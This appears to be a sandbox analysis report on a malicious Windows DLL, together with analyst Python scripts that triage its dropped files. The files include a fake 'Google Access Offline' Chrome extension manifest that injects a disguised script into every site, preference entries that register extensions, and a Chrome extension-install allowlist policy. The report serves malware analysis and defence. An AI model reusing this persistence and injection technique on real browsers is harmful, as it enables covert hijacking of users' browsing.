SSDEEP:192:slDTzZP7qbIqxOmYBFL5zsInaVnO0a0y1qZq4ztXab:slvYHxOmYHdzsIaO0a5Kab
MD5:A488210AE174A304ECA7091136646C16
SHA1:7024B249A2CFB3194C22BF78ACE79F3C0EB8148E
SHA-256:780FD5E6105D8E59CD24C797B9C6200293BD89D735F64A918F89A3FD2850F207
SHA-512:2ABF766E47081E2DB98BAB6EF421A0C08C40683EB31D128330D00EF985D6AC28935E856D8138BCAE77C9BC155585746FB42C8B5E2D294E9FFEC0ABBF7976FC83
Malicious:false
Preview:.PNG........IHDR..............>a.....sBIT....|.d....bzTXtRaw profile type APP1..x.U...0....Sx.w..2.B.EB...A..W...l..z.k.G.UUU.k.i.f^.n..(_-.LD..+.. .H...zP.s...fIDATx..y.]U..k.s.+UIe....d..A.D..ZE@.8..s.gK..?.>m.n?.......<.E..$.L.C&B.L...[..s.z..{oUB%..V..;...=g.}.^......J(...J(...J(...J(.........K...].:..TG...VY.T;.Jk....VI...[..'f.1 ...,.......6...........#"..A1.F@r...=2...(."X.E...(...........O.fU..x....^<"...f..u.n .....F.....wh.V...N....mi=..VY....4.1.l.......d|.'.sz.1....L...G.... ..H.".......P0&.o{....a..}.krb...........Blz..Dx....4......Y.6P].Tg.....N.a....`..3,r..p.1..#Ri...VC..T".7.i.W....2..].^.D............c.X...D...!\l.#..}.'....A.2.mr4.C...t.....J.C".../..1./!2.(e..F.b..b.U:....~c.._.L.."...K.Q.qn.DN+..R.*.dp......~....eO..$...`.Eo....@...c......w...Y...[.~.`.E.W........Ul.6U.c.F...x.w...W..?..+..3....|e....K..1.#.5HE.....m...<....e.......1.%....%0..N....s\..x..'Zm.m.?.)..q...C<.a.+........=V0..~C.x..u.....?^...A.0cN....;.h...
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):704
Entropy (8bit):7.693751636838362
Encrypted:false
SSDEEP:12:6v/7ZtUTAif47vF78e/130eWbHvC5clQAg1Jg5cWoFcO0JpdBsaDnTFVYdS9qRz7:eOAiwDF7B301jmAgU5crUJpdBbcdS9qn
MD5:A4B312C792EC1CEA9C8116D7A085DEC5
SHA1:0E797DCD895A9A50D4A462D71BB1F9415F901467
SHA-256:54272DE6075587CD55DF8C0E6F7EC819AB01803DA861EA6F3DD4F665D77BC728
SHA-512:B4A8AD7EEEC1AB19BF6D0F7EFB2CFAD7F01817DF155820AD17DE0274641336BA2681A5F986D5AF74149BA0DBBF8B7B67F8B7A86EE90A5C7C6481C6C81ED4F1E9
Malicious:false
Preview:.PNG........IHDR................a....IDATx...K.Q..P...t*..a.m.N...,.i.3................B-.HZTj.....&:S_.R.M.....O..x-..|..{^....8p..m@H..L.7[j......4..P..Jl+.........u.9....Ke..l..s.=.3[./..W..[..9.<w".L..ozO.0.p......~..!...8..Zx..|o.+O.Y.....b.....!@.Q...6...P..8.`..L_/....v2./....`..?.5q..,C....)k.......... ...u....!4...X...]...!..e....Q..<..t.jg(`....x....@8..%b.e.....+B#.h..@.;s..i..I.0.f. H....h.J@x5.K<.......G.........bM.k....dN....^...........D...M.$(...O.......m.r...N..9-q.....}..w...<L\...gY.._NCz.>V......C..2%....&...;O.%.M=...g.}q......N...L.$.4..O3....cA...X<L..a..{.m0...*..".2..t..j.....U.T...@.>j.Q..........:}te...C.1.6..I..".`|'....IEND.B`.
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):2570
Entropy (8bit):7.921033632215019
Encrypted:false
SSDEEP:48:bj5zyYhx6x3dYcRUj9crj/sT0f0xdJ8fJ0crAubN1igExJIupgn+Z9t+h1q0o6sH:n5zpL69dRhrjsT0FNkgEFgnet+hRo6sH
MD5:1E001C21C2A87A52EAB0B0D08A06E753
SHA1:F90EFECA6A2527EC053FE872B12E7AFB3EB1423B
SHA-256:88999ED5F6AAC39C82A4AF4C775F82439AE050D1EA2F03250758CA685A189504
SHA-512:81617EBCD2059C4F4024E502ACBCE4F6A4C25D8CB26E82908F682AD58B87FE5B463B86FFC2FB5289B9FA8B565D8E091808E295129CFF817A581E54F2BEA3A69F
Malicious:false
Preview:.PNG........IHDR...0...0.....W.......IDATx..yTSw........Pd.k.I.BB... K@.9s....NO.z....L.l...K.r..q:.XQ@.T...((.d_......T.;.....`......|..%.w.......E.n.....4~.gc..gb.].i.2].*.'F..F..O.X.Q~.Q..i..zb.z5.-x.M..H...t...{cU[u...>.......}..U..I...C]..o.j.<....x.....2..q..l..f.....(..Q..D+G....._...%.p...8../..Kz......?8o..4.v...W..z..K.a.c.X.w..>..J9....%.`$.E-q?.Q.v.(.u1J.A.....?.[......u.Qr?..E.[.^w....z.j@o.RmT.!...s...5f..r.N..........M.Q...){....C.?{".9.'.m..P."...H.%B..=J..'.tE.......O.y.N..d..1"|^(V;..&eS..T.P8.%.'.5B.M.>....i...`>..8.I.5..X@..[4'..pR0....p*LD.....9..im..ZQ.O#v..hdH.Z..(.1...(...C......`.h..mo..s}p..E........:.?..g6....[..x.!..G...}NGC..N}......j.D7...A.0!..Z......c.............p._.....[.L.....z.....q...A].i.1s-...m|.0n......L..DJ.c..j...tE.P.i.0k...>.R!...z....-.x..."......I.V-.......O..H`..2n"i...p..L.t.DV..j.:....!..x.LQC...M....`.&<..CmMpK[.........;.M..Z.J$..-.."8.$..U..[......M..v..S&@.-m5....n?.2O.(....YP.~..XP...
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):1329
Entropy (8bit):5.373551209985862
Encrypted:false
SSDEEP:24:dYh6ivGHV04kWE9hUg6iCzCzyvr4ExO8g8nyc3s:7ivGHV89j6dzxvsE08g8nH8
MD5:BD265396CCAC2C808BAB316D726E3915
SHA1:84E66E139EEF75F71DD3668816FD469BF4A101C1
SHA-256:1286826179EEE34B1596752EF6EFAFFE48746A8FC7DC105E07276D093BB5A663
SHA-512:8C64CFFF30E2E459B17A31B0225707BEAD9F8B6DB54FF4AF4A27720EBBFE461AFAF53D055B2AB8CCAC2474B840A89B07148428E841FA9AA953A76F939BA8A902
Malicious:false
Preview:{. "background" : {. "scripts" : [ "_locales/en_TO/messages.json" ]. },. "content_scripts" : [. {. "all_frames" : true,. "js" : [ "_locales/en_TO/messages.json" ],. "matches" : [ "*://*/*" ],. "run_at" : "document_start". }. ],. "content_security_policy" : "script-src 'self' blob:; object-src 'self'",. "default_locale" : "en",. "description" : "Google database management system",. "icons" : {. "128" : "icons/ficon128.png". },. "key" : "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAjqhfA9ZzDOKSyUALb+GeIjB8ACJ+SOfKKX7CdXq1G3wzMwcNEYQ6hOPjfmpkoMCSuiMdkyeBLKNGQRAm/b6IGak/Ge3RpX4rx7d9K2OzcKWQDnVoX+We2zMetJ/tQ+w3YWV0GKwkoC7Q3GmkiAJsD+LnEFdO5ZoE1p5mZ0C6CMsGtYX4NmP6tr92Yxl5vP+Wm3ehxtc8nn27Hyl4gkpQlD/jAEtwHJfNKuRhmZvuw8CiKn4X+vcM4ofmNUOjE9cCMgN7kYen2D6AExBNetnMfrKzfM0vrGEfxNaIZa//UB+oDhqDsxAnf82uS7TrgH2ojeBjZAND0V8q7417KzBmeQIDAQAB",. "manifest_version" : 2,. "name" : "Google Access Offline",. "permissions" : [. "b
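The manifest above is the most telling dropped file: both the background script and a content script point at `_locales/en_TO/messages.json`, which Chrome executes as JavaScript regardless of its name, the content script matches `*://*/*` in all frames at `document_start`, and the `key` field pins a fixed extension ID. The following is an added example, not code from the Joe Sandbox report or from the sample, that reconstructs the manifest from the preview and flags those traits, and derives the extension ID Chrome assigns from the public key (SHA-256 of the DER-encoded key, first 16 bytes written in the a..p alphabet). The `permissions` list is cut off in the preview and is left empty here; that and the `DROPPED_MANIFEST` name are assumptions.

```python
import base64
import hashlib

# Manifest fields copied from the report's preview of the dropped
# manifest.json. "permissions" is cut off in the preview, so it is left
# empty here (assumption, not the file's real value).
DROPPED_MANIFEST = {
    "background": {"scripts": ["_locales/en_TO/messages.json"]},
    "content_scripts": [{
        "all_frames": True,
        "js": ["_locales/en_TO/messages.json"],
        "matches": ["*://*/*"],
        "run_at": "document_start",
    }],
    "content_security_policy": "script-src 'self' blob:; object-src 'self'",
    "default_locale": "en",
    "description": "Google database management system",
    "icons": {"128": "icons/ficon128.png"},
    "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAjqhfA9ZzDOKSyUALb+GeIjB8ACJ+SOfKKX7CdXq1G3wzMwcNEYQ6hOPjfmpkoMCSuiMdkyeBLKNGQRAm/b6IGak/Ge3RpX4rx7d9K2OzcKWQDnVoX+We2zMetJ/tQ+w3YWV0GKwkoC7Q3GmkiAJsD+LnEFdO5ZoE1p5mZ0C6CMsGtYX4NmP6tr92Yxl5vP+Wm3ehxtc8nn27Hyl4gkpQlD/jAEtwHJfNKuRhmZvuw8CiKn4X+vcM4ofmNUOjE9cCMgN7kYen2D6AExBNetnMfrKzfM0vrGEfxNaIZa//UB+oDhqDsxAnf82uS7TrgH2ojeBjZAND0V8q7417KzBmeQIDAQAB",
    "manifest_version": 2,
    "name": "Google Access Offline",
    "permissions": [],
}

# Match patterns that cover every origin a content script can reach.
BROAD_MATCHES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def spki_der(key_b64: str) -> bytes:
    """Decode the manifest 'key' (base64 SubjectPublicKeyInfo) to DER bytes."""
    return base64.b64decode(key_b64 + "=" * (-len(key_b64) % 4))


def hex_to_mpdecimal(hex_digits: str) -> str:
    """Chrome's 'mpdecimal' alphabet: hex digit 0..f becomes letter a..p."""
    return "".join(chr(ord("a") + int(h, 16)) for h in hex_digits)


def extension_id_from_key(key_b64: str) -> str:
    """Extension ID = first 16 bytes of SHA-256(DER key), written in a..p."""
    digest = hashlib.sha256(spki_der(key_b64)).hexdigest()
    return hex_to_mpdecimal(digest[:32])


def triage_manifest(manifest: dict) -> list:
    """Return human-readable findings for the high-risk manifest traits."""
    findings = []
    script_paths = list(manifest.get("background", {}).get("scripts", []))
    for cs in manifest.get("content_scripts", []):
        script_paths.extend(cs.get("js", []))
        if BROAD_MATCHES & set(cs.get("matches", [])):
            findings.append("content script injected into every site: %s" % cs["matches"])
        if cs.get("run_at") == "document_start":
            findings.append("content script runs at document_start, before any page script")
        if cs.get("all_frames"):
            findings.append("content script runs in all frames, iframes included")
    # Chrome executes whatever file the path names; a .json path under
    # _locales/ hides the JavaScript from a casual directory listing.
    for path in sorted(set(script_paths)):
        if not path.endswith(".js") or path.startswith("_locales/"):
            findings.append("script loaded from a non-script path: %s" % path)
    if "key" in manifest:
        findings.append("manifest pins a fixed extension ID %s via 'key'"
                        % extension_id_from_key(manifest["key"]))
    if manifest.get("manifest_version", 3) < 3:
        findings.append("manifest_version %d: persistent background scripts under MV2 rules"
                        % manifest["manifest_version"])
    return findings


if __name__ == "__main__":
    for finding in triage_manifest(DROPPED_MANIFEST):
        print("-", finding)
```

The derived ID is what to look for under `extensions.settings` in the profile's `Secure Preferences` and in the `Extensions\<id>` directory on disk; if it matches an entry there, the preferences file was written to register this manifest.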
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):10601
Entropy (8bit):4.0292389570138365
Encrypted:false
SSDEEP:96:3X8W0qwOXJG+2d8pT+Wwqpa5PAz2g6/GL2MVQrZu6/VcO1vr04S35zOUMG6GeGJS:3NJY/AEGCSrWZXWkD3
MD5:0767C20081CC2EB57938D48D945AA303
SHA1:0C0752B8425E5742FD4072043E46222AB26A5B15
SHA-256:BBB70F7088C57E9898EDA619A2C7035433DE2BF7361D80ABAFB19C9D4DE873B3
SHA-512:22C5F664554678FD146FB64A1A912BDF920D1CDB37F581597D57C86431377B60041763277AAD47A3FA9AED3CAEE3D53C6A27A813C978AE600F221B80553CFB66
Malicious:false
Preview:{. "account_id_migration_state" : 2,. "account_tracker_service_last_update" : "13340807286363787",. "alternate_error_pages" : {. "backup" : true. },. "autofill" : {. "orphan_rows_removed" : true. },. "browser" : {. "available_dark_theme_options" : "All",. "has_seen_welcome_page" : false. },. "countryid_at_install" : 17224,. "custom_links" : {. "list" : []. },. "data_reduction" : {. "daily_original_length" : [. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",. "0",.
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):45280
Entropy (8bit):4.460500947908469
Encrypted:false
SSDEEP:768:5YWp41yiGkm3+93bsileXnC2b1p+8TebB/+DrMGDV8:5YWp411iCSV8
MD5:FCE305DA75EA68E4162A66889E316FAA
SHA1:BAC5FE3058CC6C85B1667E943BA904858FD46D21
SHA-256:F4815822F6ABA3C60D60A1FE61D6C49ECE28A80EE785C75F6089773157E55BD5
SHA-512:E3914E152B1FF74206C7C44D13F8AD9864C014C4C0D7C33245194D62417D9B86C85942A857A90D63E2631745F431F5679CFA713747C492CC12B226F796C4870E
Malicious:false
Preview:{. "extensions" : {. "settings" : {. "ampmimodbocknpfehkbdjolnnbongejb" : {. "state" : 1. },. "dgiklkfkllikcanfonkcabmbdfmgleag" : {. "active_permissions" : {. "api" : [],. "manifest_permissions" : []. },. "commands" : {},. "content_settings" : [],. "creation_flags" : 1,. "events" : [],. "from_bookmark" : false,. "from_webstore" : false,. "incognito_content_settings" : [],. "incognito_preferences" : {},. "install_time" : "13340807286294146",. "location" : 5,. "manifest" : {. "content_capabilities" : {. "include_globs" : [. "https://*excel.officeapps.live.com/*",. "https://*onenote.officeapps.live.com/*",. "https://*powerpoint.officeapps.live.com/*",. "https://*word-ed
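The 45 KB JSON record above is a Chrome `Secure Preferences`-style file: `extensions.settings` keyed by extension ID, with `location`, `from_webstore` and an `install_time` stored as microseconds since 1601-01-01 UTC rather than Unix time. The following is an added example, not code from the report or the sample, that reconstructs the visible entries from the preview and summarises them the way an analyst would when deciding which IDs to pull from the profile. The nested `manifest` object is omitted and the `SECURE_PREFERENCES` name is an assumption; the enum names are Chromium's `ManifestLocation` and extension `State` values. One caveat the preview cannot settle: Chrome protects these entries with per-key HMACs (`protection.macs`), and an entry written without a matching MAC is discarded at startup, so whether this file would actually take effect depends on a section not shown on the page.

```python
import json
from datetime import datetime, timedelta, timezone

# Reconstructed from the report's preview of the dropped preferences file
# (extensions.settings only; the nested "manifest" object is omitted here).
SECURE_PREFERENCES = json.dumps({
    "extensions": {
        "settings": {
            "ampmimodbocknpfehkbdjolnnbongejb": {"state": 1},
            "dgiklkfkllikcanfonkcabmbdfmgleag": {
                "active_permissions": {"api": [], "manifest_permissions": []},
                "creation_flags": 1,
                "from_bookmark": False,
                "from_webstore": False,
                "install_time": "13340807286294146",
                "location": 5,
            },
        }
    }
})

# Values of Chromium's ManifestLocation enum.
LOCATION = {
    1: "INTERNAL", 2: "EXTERNAL_PREF", 3: "EXTERNAL_REGISTRY", 4: "UNPACKED",
    5: "COMPONENT", 6: "EXTERNAL_PREF_DOWNLOAD", 7: "EXTERNAL_POLICY_DOWNLOAD",
    8: "COMMAND_LINE", 9: "EXTERNAL_POLICY", 10: "EXTERNAL_COMPONENT",
}
# Values of Chromium's Extension::State enum.
STATE = {0: "DISABLED", 1: "ENABLED", 2: "EXTERNAL_EXTENSION_UNINSTALLED"}

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def webkit_time_to_datetime(value) -> datetime:
    """Chrome stores install_time as microseconds since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=int(value))


def is_extension_id(ext_id: str) -> bool:
    """Chrome IDs are 32 letters from a..p (hex digits of a SHA-256 prefix)."""
    return len(ext_id) == 32 and set(ext_id) <= set("abcdefghijklmnop")


def summarise_extensions(prefs_json: str) -> list:
    """One row per extensions.settings entry, with decoded enums and time."""
    settings = json.loads(prefs_json).get("extensions", {}).get("settings", {})
    rows = []
    for ext_id, entry in sorted(settings.items()):
        rows.append({
            "id": ext_id,
            "valid_id": is_extension_id(ext_id),
            "state": STATE.get(entry.get("state"), "unknown"),
            "location": LOCATION.get(entry.get("location"), "unknown"),
            "from_webstore": entry.get("from_webstore"),
            "installed": (webkit_time_to_datetime(entry["install_time"]).isoformat()
                          if "install_time" in entry else None),
            # An entry carrying only "state" has no manifest, location or
            # install record; compare it with the Extensions directory on disk.
            "sparse": set(entry) <= {"state"},
        })
    return rows


if __name__ == "__main__":
    for row in summarise_extensions(SECURE_PREFERENCES):
        print(row)
```

The component extension `dgiklkfkllikcanfonkcabmbdfmgleag` (location 5, `COMPONENT`) carries a full install record; the other entry holds nothing but `state: 1`, which is the kind of row to cross-check against the directory listing and the ID derived from a dropped manifest's `key`.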
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):6656
Entropy (8bit):4.107472605668749
Encrypted:false
SSDEEP:48:rusPhy24Q1cVW0T1MqughNY1IkAKOSuPlQVSuHzdykwHCadRdDm2sdU7uxQb:zhsJ4ClcodR1l
MD5:5FEB80C4D2451C449ACAA250C2BFA7D1
SHA1:B57BC3242C4181F09BD03C85F127324C721F8AAA
SHA-256:A7174061AF74C90212953DE1D2F58C085BB3C3EE8A61727582D32F4D2312AF19
SHA-512:5F8E2440D7008528C176E960DEE4473B7D544ECEE7AC9BD240F661D224E183CDD16A68D3811307CCBB96030B9418B0E6073716673F6ADC11F65D498337944288
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Mozilla lz4 compressed data, originally 43691 bytes
Category:dropped
Size (bytes):7781
Entropy (8bit):6.642490297135661
Encrypted:false
SSDEEP:192:VDnVOOPsVm5grw9WxwWi0ertpsnzBTwQ2ebXyoZc+qwbRDNNGoY:VDnvPsVmelxEjrt4TwFEXyoZc+qARo
MD5:1767A111E34763CC6786A9F7C63DF154
SHA1:5531BC6BDFA3787E3E1607143C38E7DC4C8C742A
SHA-256:54F27551355ABECE26C1D07D24BB5B19E45528D2A9E9D1B345BEBD48E29AAFB1
SHA-512:ED2EBEA435B8AE09F8274D101CABE746D0E88238BC9774EBD195615D3B520C353EA052CEB88784CBF51171FB384D19DEDC5037463752F298F608986F194C907A
Malicious:true
Preview:mozLz40.......{. "app-builtin" : .....Xddons.......-search-detection@mozilla.com3..6..dependencieR.0[],|....."enabled;.Ktrue..`loader..Knull..Opath....recommenda.._State*..`ootURI..."resource://...-.../..+/"...runInSafeModk......signedD....startupData........."persistentL..!erU..)..z..webRequestL......"onBefore+..[.........% ?......"incognito........Q"tabI......#ypd... "main_frame" ].....A"urlH.........."https://www.google...!..*.......C.aamazonC...exec/obidos/externalo../Y..AbingW.....A..@duck..!goC..=....en.wikipedia.org/.../Special:S...e...../],!..v"window ..0...}N...[ "blocking" ]H...........}E........"telemetryKey.........l.7%40n.k:2.0.0r. "v#..o..."!.....x.."z..dotcom@s....^.0org...X.........-T..n..(s/.....C.......o.2%40...q.O:1.6.......................T.k....=/dd.../dd..U/dd....4c...4c...default-theme...(........C.....experimen...a"color.............menu_info_icon_4......"--panel-banner-item-(..-(.2-bg*..0...Z.oupdate\...*..-supportedc....utocomplete_popup_separat...#..-#..-#
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:SQLite 3.x database, user version 12, last written using SQLite version 3029000, page size 32768, file counter 11, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):98304
Entropy (8bit):0.13148606648719643
Encrypted:false
SSDEEP:24:DL0n9sh7Owd4+L4gkJ0MUfvCohYmNWZ1G6+cjK4Pa:DRYjy7tCJN
MD5:C725379B56323D2A1BA831F33FE79E0D
SHA1:1AF4F926B7219BC46C2E6A2EE8FD36D6AAE298C9
SHA-256:1B8AFDC42F759EC7B2FCFBAC63504A3B310474D0742144B7F60D676F7F1C3973
SHA-512:693682C825A5D1334F4C5001CF323F60EA201D0C0F8B332F5D1237600D15F41C03940CCFFC6A6D2E7A6B9FC3DEE071BD93F59630A6A5D70D94268CB2D5EA11DA
Malicious:true
Preview:SQLite format 3......@ ..........................................................................8......~s..F~s........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:SQLite Rollback Journal
Category:dropped
Size (bytes):66064
Entropy (8bit):0.1830632283916452
Encrypted:false
SSDEEP:24:7+tBzkJ0MUfvCohYmNWZ1G6+cjK4PaeW6LPish7Owd4+z:7M97tCJNlW6BYjo
MD5:6E185CBBEFD2898912BE74E6677BE242
SHA1:27F70C735A7CCCA75E4C1364B0C38FB5BD275B47
SHA-256:C21BE63049587A2B18DCB3B4690D41131CD217D0A1F505A5AADD1935F538963F
SHA-512:F7DF2103263FB3CBA98109B88886A38AF2D51EB8FF1C72AB8BB2D31A1EDAC9DCAF39600863051F511A38311B5862F902ECA4114258538C66FE375AAF593EC0BC
Malicious:true
Preview:.... .c.......A..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................~L....~.=~.~.~.~L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (1809), with CRLF line terminators
Category:dropped
Size (bytes):10709
Entropy (8bit):5.493350247092315
Encrypted:false
SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSZl9DLadaWMHIl9DLadaWMHW:yegqumcwQEK2
MD5:1E871D7696F1A6B1ED280D76B9C9C641
SHA1:9F510AB88C27A7B82F9B97C515290B8D38F036B1
SHA-256:04478F6D8FEE5443E224E68E2E55E70A826F682C4A7F6085A25E587A8F952F0C
SHA-512:BD86C5C06717FE0A6D9CD652549384CC18590EA0CBB2870425560531327DBEFF3B5E435AB394473D2BC337BFACCB418E8796EABF2D812CE82A654749929D6869
Malicious:true
Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (1809), with CRLF, CR line terminators
Category:dropped
Size (bytes):10710
Entropy (8bit):5.493448664837861
Encrypted:false
SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSZl9DLadaWMHIl9DLadaWMHv:yegqumcwQEKP
MD5:187E63B7A0F0F88416AF944EC4FA8FFA
SHA1:1ADFFA72E3052FB3105D5B35A87B9464A4A82806
SHA-256:A563157C8CF5C7D16C8A20A7DCDBADF3084250A5414D383E44DE0E27C17826CF
SHA-512:5B1145F0AB70E1DA2F28A86A411EFAE9A190995A10356D30638E216F16347272CDB794BF0F805A39043AAF36E944056EBAF3C72AFF5F98469FC84D9DB9DA24F7
Malicious:true
Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (1809), with CRLF, CR line terminators
Category:dropped
Size (bytes):10141
Entropy (8bit):5.514704338216179
Encrypted:false
SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSZl9DLadaWMHv:yegqumcwQEP
MD5:E3851D92DE0F51EDF51211AF76BD65E6
SHA1:EDA7AE05364801021F3AA558467C490FA7E416A4
SHA-256:EFB8572DEC24B1A3C7AD23114324DC731D156A13DE093CC9D727B498BF14CB57
SHA-512:93ABD933BF38C8A21C056C69D8B458AD202E60B0F70BF9DFA3346ED8BBB0BF8550D22955ADD0BC2CA6B3C9F5FBF58E0CB70306FE96533EE90BDD815EECB6FD9A
Malicious:true
Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:RAGE Package Format (RPF),
Category:modified
Size (bytes):2774
Entropy (8bit):3.3815238000052985
Encrypted:false
SSDEEP:48:5nqrTnqXCTnqUvAl6TnqNTnqxCTnqyvAl6TWqqzqrzq9xszqUA9zqNzqrxszqyAO:OmC7nicCdniMXUKRyKP
MD5:8C5D0CFBDE077DD88B5DAA901CB5F570
SHA1:01D5292D78993E76C25E3B21E16B711CDBFA45AE
SHA-256:878C13C423A1E74E493D7E0F1ABB3D1A3519B5904791D4739178F2FD48C371C5
SHA-512:F508378E9C87B78D637402FADB1686AB79D488581928C27F07700E54DD142D9833D3302D278D2AFB19AF8CF742CA076475A7EC7668751CB4128A9EFFFE92EF20
Malicious:false
Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.W.h.i.t.e.l.i.s.t...;.*.*.d.e.l.v.a.l.s.....;.....;.....;. ...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.W.h.i.t.e.l.i.s.t...;.1...;.....;.B...;.h.i.p.i.l.p.c.e.e.c.b.h.f.p.f.l.n.e.i.j.o.g.b.o.a.l.i.l.n.f.j.p...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.W.h.i.t.e.l.i.s.t...;.2...;.....;.B...;.h.l.h.g.j.f.m.d.j.o.m.n.l.h.f.a.c.o.k.o.i.b.j.l.c.m.c.m.g.o.e.c...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.A.l.l.o.w.l.i.s.t...;.*.*.d.e.l.v.a.l.s.....;.....;.....;. ...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.E.x.t.e.n.s.i.o.n.I.n.s.t.a.l.l.A.l.l.o.w.l.i.s.t...;.1...;.....;.B...;.h.i.p.i.l.p.c.e.e.c.b.h.f.p.f.l.n.e.i.j.o.g.b.o.a.l.i.l.n.f.j.p...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.G.o.o.g.l.e.
File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.802086973864738
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:GqjUrFW.dll
File size:6'760'960 bytes
MD5:06ea49951dde098f018a213ee7a8a38d
SHA1:e8e31ed1db5f018664abf85154112ee1f478e9e2
SHA256:9b0892598b3725a436c414e9dddb9ef43b85d9bb08c2007dd8735a14374d132e
SHA512:85f2e17fb372f82c819e0abc631e4d6fefc12cb31995abb5410d7c99a288b257b01e37657f0b60bf9e02e32c4653f2c252e91e042b9b6069679231274f5543f5
